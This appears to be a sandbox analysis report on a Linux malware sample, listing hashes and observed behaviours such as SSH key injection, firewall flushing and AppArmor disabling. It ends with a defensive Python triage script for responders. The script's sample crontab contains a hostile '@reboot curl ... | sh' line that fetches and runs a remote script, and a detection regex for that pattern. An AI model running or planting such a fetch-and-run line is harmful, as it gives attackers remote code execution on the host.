General

Target: 4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118
Size: 36KB
Sample: 240516-ync54adf9s
MD5: 4cc8f97c2bf9cbabb2c2be292886212a
SHA1: 84f4412443bd6de78a9bab54a0d8a07540762173
SHA256: d800ac7d4b7ddb5737fdd23fe898daa25ebaf0f190bf40136e4f6c9d9ee4a5af
SHA512: c37fb4d6f1298eee51a2c780872027d0a331cbf032d2a8309a702d30d546d7eb4d2c62edf124b8e0249ca1f763ce3bcb2f8e65fc3c15e83d302a089b0feb2fe3
SSDEEP: 384:2K0zocqi59R3zNz0+qrG+p+7hKixbN9kYHjuj4cT6P0TjzbloRf1Ibkb1SaN1VGN:gqi59qmP5HJiCz4D6h5Zab11V7eePj5
Static task
static1

Behavioral tasks
behavioral1: sample 4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118, resource ubuntu1804-amd64-20240508-en
behavioral2: sample 4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118, resource debian9-armhf-20240226-en
behavioral3: sample 4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118, resource debian9-mipsbe-20240418-en
behavioral4: sample 4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118, resource debian9-mipsel-20240418-en
Malware Config

Targets

Target: 4cc8f97c2bf9cbabb2c2be292886212a_JaffaCakes118
Size: 36KB
MD5: 4cc8f97c2bf9cbabb2c2be292886212a
SHA1: 84f4412443bd6de78a9bab54a0d8a07540762173
SHA256: d800ac7d4b7ddb5737fdd23fe898daa25ebaf0f190bf40136e4f6c9d9ee4a5af
SHA512: c37fb4d6f1298eee51a2c780872027d0a331cbf032d2a8309a702d30d546d7eb4d2c62edf124b8e0249ca1f763ce3bcb2f8e65fc3c15e83d302a089b0feb2fe3
SSDEEP: 384:2K0zocqi59R3zNz0+qrG+p+7hKixbN9kYHjuj4cT6P0TjzbloRf1Ibkb1SaN1VGN:gqi59qmP5HJiCz4D6h5Zab11V7eePj5
Score: 10/10

- Adds new SSH keys: writes to the Linux file that holds authorized SSH keys; a threat actor may add a key of their own for further remote access.
- Executes dropped EXE
- Flushes firewall rules: flushes or disables firewall rules inside the Linux kernel.
- Attempts to change immutable files: modifies inode attributes on the filesystem so that files marked immutable can be changed.
- Creates/modifies Cron job: cron runs tasks on a schedule and is commonly used for malware persistence.
- Deletes log files: deletes log files on the system.
- Disables AppArmor: disables the AppArmor security module.
- Enumerates running processes: discovers information about currently running processes on the system.
- Write file to user bin folder
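The signatures above are what the sandbox observed; the block below is an added example of the host-side checks a responder would run to confirm the same behaviours on a suspected machine. It is not code from the report or the sandbox vendor. Every check is a pure function over text you would collect from the host (authorized_keys contents, a crontab, lsattr output, iptables-save output, the AppArmor profile list from /sys/kernel/security/apparmor/profiles), and the sample inputs are constructed here so the script runs offline; the paths, keys and addresses in them are invented for illustration.

```python
import re
from typing import Dict, List, Set

# --- Constructed sample inputs (invented for this example, not from the report) ---
AUTHORIZED_KEYS_BEFORE = (
    "# admin workstation\n"
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAdminKey admin@ws\n"
)
AUTHORIZED_KEYS_AFTER = AUTHORIZED_KEYS_BEFORE + (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleDroppedKey root@unknown\n"
)
CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
    "* * * * * /tmp/.x/update >/dev/null 2>&1\n"
    "@reboot curl -s http://203.0.113.5/s.sh | sh\n"
)
# lsattr prints "<attribute flags> <path>"; 'i' in the flags means immutable.
LSATTR_BEFORE = (
    "----i---------e------- /etc/passwd\n"
    "----i---------e------- /etc/ld.so.preload\n"
    "--------------e------- /etc/hosts\n"
)
LSATTR_AFTER = (
    "----i---------e------- /etc/passwd\n"
    "--------------e------- /etc/ld.so.preload\n"
    "--------------e------- /etc/hosts\n"
)
IPTABLES_SAVE_FLUSHED = (
    "*filter\n:INPUT ACCEPT [0:0]\n:FORWARD ACCEPT [0:0]\n:OUTPUT ACCEPT [0:0]\nCOMMIT\n"
)
IPTABLES_SAVE_NORMAL = (
    "*filter\n:INPUT DROP [0:0]\n:FORWARD DROP [0:0]\n:OUTPUT ACCEPT [0:0]\n"
    "-A INPUT -p tcp --dport 22 -j ACCEPT\nCOMMIT\n"
)
# /sys/kernel/security/apparmor/profiles lists "<profile> (<mode>)" per line.
APPARMOR_PROFILES_OK = "/usr/sbin/sshd (enforce)\n/usr/bin/man (complain)\n"
APPARMOR_PROFILES_OFF = ""


def _key_lines(text: str) -> Set[str]:
    """Non-comment, non-empty lines of an authorized_keys file."""
    return {ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")}


def new_ssh_keys(before: str, after: str) -> List[str]:
    """Keys present in the later snapshot that were absent from the earlier one."""
    return sorted(_key_lines(after) - _key_lines(before))


# World-writable or hidden directories, or a download piped straight into a shell.
SUSPICIOUS_CRON = re.compile(
    r"(/tmp/|/dev/shm/|/var/tmp/|/\.[^/\s]+/|"
    r"(curl|wget)[^|]*\|\s*(ba)?sh\b)"
)


def suspicious_cron_entries(crontab: str) -> List[str]:
    """Crontab lines whose command matches common persistence patterns."""
    return [ln.strip() for ln in crontab.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")
            and SUSPICIOUS_CRON.search(ln)]


def immutable_files(lsattr_output: str) -> Set[str]:
    """Paths whose lsattr flag field carries the 'i' (immutable) attribute."""
    files = set()
    for ln in lsattr_output.splitlines():
        attrs, _, path = ln.partition(" ")
        if "i" in attrs and path:
            files.add(path)
    return files


def immutable_cleared(before: str, after: str) -> Set[str]:
    """Files that lost the immutable flag between two lsattr snapshots."""
    return immutable_files(before) - immutable_files(after)


def firewall_flushed(iptables_save: str) -> bool:
    """True when the filter table has no rules and every chain policy is ACCEPT."""
    rules = [ln for ln in iptables_save.splitlines() if ln.startswith("-A ")]
    policies = re.findall(r"^:\S+ (\S+) ", iptables_save, re.M)
    return not rules and bool(policies) and all(p == "ACCEPT" for p in policies)


def apparmor_enforcing(profiles: str) -> bool:
    """True when at least one AppArmor profile is loaded in enforce mode."""
    return any(ln.rstrip().endswith("(enforce)") for ln in profiles.splitlines())


def triage() -> Dict[str, object]:
    """Run each check on the samples, keyed by the report's signature names."""
    return {
        "Adds new SSH keys": new_ssh_keys(AUTHORIZED_KEYS_BEFORE, AUTHORIZED_KEYS_AFTER),
        "Creates/modifies Cron job": suspicious_cron_entries(CRONTAB),
        "Attempts to change immutable files": immutable_cleared(LSATTR_BEFORE, LSATTR_AFTER),
        "Flushes firewall rules": firewall_flushed(IPTABLES_SAVE_FLUSHED),
        "Disables AppArmor": not apparmor_enforcing(APPARMOR_PROFILES_OFF),
    }


if __name__ == "__main__":
    for signature, finding in triage().items():
        print(f"{signature}: {finding}")
```

The before/after comparisons (SSH keys, immutable flags) need a baseline, so on a real host they are only as good as the snapshot you took before the infection or the copy you can pull from a trusted image; the cron, firewall and AppArmor checks work from a single capture. A flushed filter table with ACCEPT policies is also the default on a freshly installed box, so treat `firewall_flushed` as corroborating evidence beside the other findings rather than as an indicator on its own.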